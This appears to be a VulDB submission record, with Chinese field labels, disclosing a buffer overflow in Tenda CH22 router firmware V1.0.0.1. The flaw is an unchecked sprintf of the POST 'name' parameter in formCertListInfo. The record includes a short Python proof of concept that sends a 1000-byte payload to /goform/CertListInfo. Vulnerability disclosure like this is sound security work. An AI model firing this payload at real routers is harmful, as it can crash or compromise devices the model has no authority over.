| 标题 | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| 描述 | ## Overview
- Firmware download website: https://www.tenda.com.cn/download/2230
## Affected version
CH22 V1.0.0.1
## Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `formCertListInfo` function. The `V12` variable receives the `name` parameter from a POST request and is later passed to the `sprintf` function. However, since the user can control the input of `name` , the statement `sprintf(s, "/etc/cert/%s", v12);` can cause a buffer overflow.
##PoC
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/CertListInfo'
payload = b'a' * 1000
data = {
'name':payload
}
requests.post(url, data=data) |
|---|
| 来源 | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-formCertListInfo-377df0aa11858088aabaeb0f5e1909c9 |
|---|
| 用户 | ysnysn0121 (UID 86198) |
|---|
| 提交 | 2026-06-10 15時17分 (1 月前) |
|---|
| 管理 | 2026-07-12 20時14分 (1 month later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 377893 [Tenda CH22 1.0.0.1 /goform/CertListInfo formCertListInfo 名称 内存损坏] |
|---|
| 积分 | 17 |
|---|